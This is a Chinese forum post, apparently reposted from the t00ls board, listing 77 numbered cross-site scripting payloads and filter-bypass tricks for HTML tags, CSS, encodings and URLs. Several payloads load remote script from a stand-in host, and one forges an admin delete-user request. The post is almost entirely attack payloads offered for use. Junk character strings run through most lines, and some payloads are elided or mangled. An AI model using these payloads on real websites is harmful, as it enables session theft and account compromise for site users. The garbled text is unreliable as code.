貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。" [5 w- Q6 U* P& N
(1)普通的XSS JavaScript注入
: [1 Z0 a5 @7 s4 U$ r<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ V3 y/ Z9 J% F7 E1 R
(2)IMG标签XSS使用JavaScript命令
! P# V& U7 a) R<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ i; O0 f0 v5 `; H. M(3)IMG标签无分号无引号
+ d' ~* m$ _$ N- M/ [<IMG SRC=javascript:alert(‘XSS’)>- G+ X, _) v$ s
(4)IMG标签大小写不敏感" m8 U" p) b, `! w. N- ?
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; ^0 t( e8 ^( M$ ]! w6 W+ P(5)HTML编码(必须有分号)
/ b2 \ d1 d6 r. j0 p4 A4 i& \<IMG SRC=javascript:alert(“XSS”)>
! |* P6 A: _ d" B+ Z: k0 e(6)修正缺陷IMG标签
( X- |4 v9 @. ^+ ~8 E1 j<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! s7 P1 a0 v: c/ t5 N! ^; z- n) b4 B& t: z+ ?+ R3 [/ `
. X0 k ]. S9 ](7)formCharCode标签(计算器)
: i, K) w1 L" l& V M E<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
' W7 J& N+ f1 v: P* ~(8)UTF-8的Unicode编码(计算器)+ U3 K! i! p4 d; p% j) B2 R
<IMG SRC=jav..省略..S')>
' M/ F/ A2 P: v( V(9)7位的UTF-8的Unicode编码是没有分号的(计算器): g. F# y1 M( j' [$ t. H
<IMG SRC=jav..省略..S')> [! n/ K5 E0 V1 m% y' a9 \' ^
(10)十六进制编码也是没有分号(计算器)- y+ b* S+ u' }
<IMG SRC=java..省略..XSS')>
0 j) j0 _. K) @- `+ j% d(11)嵌入式标签,将Javascript分开
; V- u3 W! ]: D* n9 v. |4 P! b/ Q<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 g3 V7 ^ u. y2 y2 T! }9 U8 s(12)嵌入式编码标签,将Javascript分开
; ~, K5 C3 ? Q. B0 C; w<IMG SRC=”jav ascript:alert(‘XSS’);”>
" f. S, D# D, d# A8 I5 G(13)嵌入式换行符
+ g0 l( x$ N7 ]- `# Q0 v<IMG SRC=”jav ascript:alert(‘XSS’);”>: O0 _$ P2 W+ q0 V: m* E% [
(14)嵌入式回车
5 e- `: s" c) {<IMG SRC=”jav ascript:alert(‘XSS’);”># r9 L' z! R. w1 k, i; @
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 q. M1 X" b* e% h0 o3 @" N<IMG SRC=”javascript:alert(‘XSS‘)”>
, E7 h" P0 @ F7 ^(16)解决限制字符(要求同页面)6 z4 h8 I1 |; g) A( n' k3 Y
<script>z=’document.’</script>
) N) h" n0 G) i" [* r) Z' C5 `<script>z=z+’write(“‘</script>7 |# R, i' p0 |, M
<script>z=z+’<script’</script>
& }2 n! i, |( v<script>z=z+’ src=ht’</script>5 F2 k( _- L+ l0 ?
<script>z=z+’tp://ww’</script>
' R1 I' V$ P" | @<script>z=z+’w.shell’</script>6 h2 @/ q% p8 X. a9 O( q* A
<script>z=z+’.net/1.’</script>4 p3 S5 p4 j# F+ I# X5 \
<script>z=z+’js></sc’</script>
7 [5 x% C u6 S* a- t: ]3 @<script>z=z+’ript>”)’</script>
$ b4 q" ?0 A7 @) x4 m! ^<script>eval_r(z)</script>' x) d/ i2 _# O/ B! s# p, t9 w# H
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
' Y1 V$ }0 C; d4 j& i3 o% N, m' _9 Bhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
' ]8 G! q2 q5 N: s: Nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 ?0 I+ F7 `1 t' {* w) N
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
% e q- \2 P* i( K/ aperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
_1 X$ m' w" N9 g0 d+ l$ T(19)Spaces和meta前的IMG标签9 O& X6 x3 g5 F/ K5 c+ b
<IMG SRC=” javascript:alert(‘XSS’);”>
! ^% Z) R1 T/ W; ~7 E(20)Non-alpha-non-digit XSS2 {* P- ?2 Q( W7 b8 v. J
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>6 S2 ?+ W! c, g
(21)Non-alpha-non-digit XSS to 27 c* @% A. V5 q# J7 j
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- v& G) Y o. O! C, w( Z, L2 N) d(22)Non-alpha-non-digit XSS to 32 Z9 F% x6 G' c" u( T. k. D3 T
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>0 b, M$ s, ^. j$ V
(23)双开括号/ v% O' }$ S. z) \( u
<<SCRIPT>alert(“XSS”);//<</SCRIPT>; m2 K. y D, u" Z& [( g" Q8 G# |+ ^
(24)无结束脚本标记(仅火狐等浏览器)
9 f, w _0 M3 K( ~2 \ y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% |: T& D- ? @% b- p& {(25)无结束脚本标记2
0 s, c3 P, s9 `9 k<SCRIPT SRC=//3w.org/XSS/xss.js>
& X: w; D. v7 A" q* X. {(26)半开的HTML/JavaScript XSS
& ^: V C- o+ y H$ Z<IMG SRC=”javascript:alert(‘XSS’)”
& _/ X. U1 U; ~" @% P w1 q(27)双开角括号
5 \. ^% S. e2 W& c<iframe src=http://3w.org/XSS.html <
8 ~3 i& c+ ?* G3 D3 i(28)无单引号 双引号 分号
- Q S( e2 e# B' a<SCRIPT>a=/XSS/6 Z* Y' X& @5 e
alert(a.source)</SCRIPT>
8 t% p" L) V' g5 x6 P" U(29)换码过滤的JavaScript
7 S: A9 H4 F+ b\”;alert(‘XSS’);//4 l1 [" U) X* O& ^, P
(30)结束Title标签
( H1 Q* K# v3 r" r8 q8 ]4 A4 _</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% ?( D3 F0 o( p( w* Z, c) R
(31)Input Image
" y( e- Y- I4 G9 A+ C+ v: p<INPUT SRC=”javascript:alert(‘XSS’);”>
\. ^7 K/ z& ~(32)BODY Image. N- G9 o; |4 H: P
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, c1 K5 d3 q. P9 Q7 Q
(33)BODY标签3 Q5 R5 d+ g6 w* T" p7 R
<BODY(‘XSS’)>/ {/ r5 Y( ]% r
(34)IMG Dynsrc2 E' z& V3 u- U
<IMG DYNSRC=”javascript:alert(‘XSS’)”>2 f; D) S2 ?8 H
(35)IMG Lowsrc
7 K! `# T: N- k$ m+ a" ]5 k<IMG LOWSRC=”javascript:alert(‘XSS’)”>0 U3 U% @ O$ g8 E. V6 C/ W
(36)BGSOUND p7 }) I7 W0 T7 u$ G( q7 _
<BGSOUND SRC=”javascript:alert(‘XSS’);”>' f6 Z; N3 H- A
(37)STYLE sheet
# D8 u0 H1 Y6 t h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
: I2 g- g6 z/ S& U8 b# `% c7 f J(38)远程样式表
% L3 t6 F0 |8 d! A8 Y<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>: v1 [% y3 r# ?2 @4 Q/ P
(39)List-style-image(列表式)! T- N: x0 |# I
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS. T3 ]* U9 ]8 J
(40)IMG VBscript
8 S3 e$ H8 @- w3 P: D<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
3 l7 s5 P3 x6 S0 J# w+ U(41)META链接url, S, c. {* S4 `" n0 ]
9 V$ f' V: t" W- }% {% L& _+ c. U- K" ~
' q6 K3 F5 S# e# }0 {" _, m- @<META HTTP-EQUIV=”refresh” CONTENT=”0;& |: n `, z. ]) Y
URL=http://;URL=javascript:alert(‘XSS’);”>
+ @. t; h7 v6 e+ O2 J; P# R(42)Iframe: n4 ~7 c. b$ X- |: R, s/ Z
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>! @( d% b1 t/ g! k ?/ G/ _7 J
(43)Frame- j$ z$ U2 [4 u, F% A& W( `
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board" w6 a9 M- d5 T4 l, G
https://www.t00ls.net/viewthread ... table&tid=15267 3/6$ C% l: e; [! P0 p
(44)Table; V8 ^, ?4 G# U9 L `; h
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
, c6 F0 X1 o# b(45)TD8 u( |7 j" D8 I. g9 D# |' @
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ q1 E8 c- @$ g" Q) l# ]
(46)DIV background-image
7 F7 y x, h- x/ H1 x+ F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 |! ^* h! T9 K% Y/ l* s' p1 } k(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-" j0 Q" Y( K9 ?7 T% `* \3 |/ I6 h
8&13&12288&65279)
2 W; X8 Z3 k" A9 B' Z, i<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; N" z0 d% O p& P. W: w(48)DIV expression
* l9 Z- T6 O) P) T W) }' I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 }1 N: V4 a9 U& _. r* v" s
(49)STYLE属性分拆表达
& c1 Z) y X- R: R& Y" V3 t4 j<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>2 Q2 h3 @0 w, V! Q! O6 [
(50)匿名STYLE(组成:开角号和一个字母开头)
6 ~. N; f# f1 u<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>8 P; k9 O% C+ i" _
(51)STYLE background-image
% X. D5 H2 [8 D# v$ R: v( `<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A P2 | A# U) ]- U0 }, z6 t& Z. ~
CLASS=XSS></A>. c. K. L) ^3 e1 c
(52)IMG STYLE方式
$ q. k6 c3 v6 b! `! _ Fexppression(alert(“XSS”))’>* ~% J# u' [; d
(53)STYLE background
* ?, L4 ^- l) @ h. L6 @<STYLE><STYLE
! f5 v# C" I. j+ |type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 N0 P3 i& k# e0 n3 t: t9 u2 X1 E
(54)BASE5 N- y8 G, k2 ^+ ^8 v3 o* w
<BASE HREF=”javascript:alert(‘XSS’);//”>- ]$ c& y/ q3 j
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- l- t2 T6 ^3 }9 q* M
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, ]0 f. I! I( D+ \" {(56)在flash中使用ActionScrpt可以混进你XSS的代码
$ p; t6 h) o( G! W# x [a=”get”;% ^) U( a8 H* o R& p0 e
b=”URL(\”";
6 l0 R& e$ H6 T4 j/ c' V/ Ac=”javascript:”;
% m3 p, _9 r3 Cd=”alert(‘XSS’);\”)”;
: @! M8 w( \, m" Seval_r(a+b+c+d);9 B1 A$ V( F1 @- F# T. `5 [; E
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
+ ?. n; a8 a7 Z) K% X6 h; {+ o<HTML xmlns:xss>
3 [2 ]2 @6 j0 F1 }7 s8 V' r; x<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
7 P. z& ?' T! m5 ~) Z<xss:xss>XSS</xss:xss>- J2 P1 z, S3 U- W* ?3 ?4 Z% V2 `
</HTML>. J+ Z* n* V0 f" E1 c
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# Q, y2 v0 C8 h$ H' ~<SCRIPT SRC=””></SCRIPT>
' |5 f) D7 X! }' Y* |8 T( s3 o(59)IMG嵌入式命令,可执行任意命令
3 Z! x6 q0 E' ^" b; ?! J% h q<IMG SRC=”http://www.XXX.com/a.php?a=b”>. W8 J* H. P; N
(60)IMG嵌入式命令(a.jpg在同服务器)* e& J" M9 m/ k
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser# V ~' e7 Q( n0 ]0 q
(61)绕符号过滤
4 E) r) W5 X+ Q" U* f<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; w2 e8 m- d8 ^
(62)5 f) v! I) O- A1 Y& C" f7 |4 I
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ B) C/ W C5 X* W9 i(63)
4 }, m& c! ?. E) r: }<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT># {0 p$ x0 ?- R6 A# w0 e
(64); B! |1 s8 r7 H6 Z
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
! w4 X3 d6 t5 z( {! W2 L0 m" W(65)
9 v4 }& U) V: H, H( f& M<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
2 x+ i5 y. a, k$ K* h(66)12-7-1 T00LS - Powered by Discuz! Board2 q8 j5 b5 E2 S5 x( J7 U# ]
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
& t( P+ G6 I1 o$ h) Z<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>" @3 ^5 X. O# n0 A% e) }4 B
(67)
6 b8 }% q E" |- _; \. v& @% ?$ `<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
- W! t3 b# T- @4 x! R, O</SCRIPT>
0 n1 P8 Z5 y$ |# }7 a# H(68)URL绕行# S6 f% q, N4 N- Y3 N1 j
<A HREF=”http://127.0.0.1/”>XSS</A>
: T# o3 X. ?7 P0 N) [(69)URL编码
3 I1 H: m0 M5 `6 X \* R, a<A HREF=”http://3w.org”>XSS</A> q7 K# f8 X, |/ n6 n1 x
(70)IP十进制
' d0 w% Z) c8 J<A HREF=”http://3232235521″>XSS</A>
, \" a L: p& ?(71)IP十六进制7 ]+ S, p& p6 {+ j8 H: d
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 u& i9 |% _& u8 b( Q
(72)IP八进制5 Q; n1 S* Z7 o3 H K: P5 N
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
) N; z& M# e* C* V9 N X6 M2 H(73)混合编码! W, N6 W3 B) [+ T" [" }5 O
<A HREF=”h& l4 _6 V* m/ x7 R7 x$ l
tt p://6 6.000146.0×7.147/”">XSS</A>
5 K: S+ U0 X9 |' a(74)节省[http:]
- ?6 A4 ^/ R8 a9 F' \5 ^<A HREF=”//www.google.com/”>XSS</A>! r+ p: N2 ]! S* g% r4 |. I
(75)节省[www]
- u$ h! [8 J0 ]+ K! j2 H! T& t" L; p<A HREF=”http://google.com/”>XSS</A>
1 l0 P6 T3 l2 ~# q& Q4 i1 S5 R(76)绝对点绝对DNS
; x8 U, t- a& f7 m) _9 @( S% M! e<A HREF=”http://www.google.com./”>XSS</A>, k, y. @8 t3 ?, s
(77)javascript链接8 e2 w7 ~' P# F7 n! F N2 f% Q
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>3 w1 w9 v8 [$ X3 x+ R1 l- f, u
8 g! G$ X' C4 [/ s( _& m% i
原文地址:http://fuzzexp.org/u/0day/?p=14
9 x. S2 l# C3 U
) F; K* P7 `5 @ |
发表于 2013-4-19 19:22:37
收藏
分享
支持
反对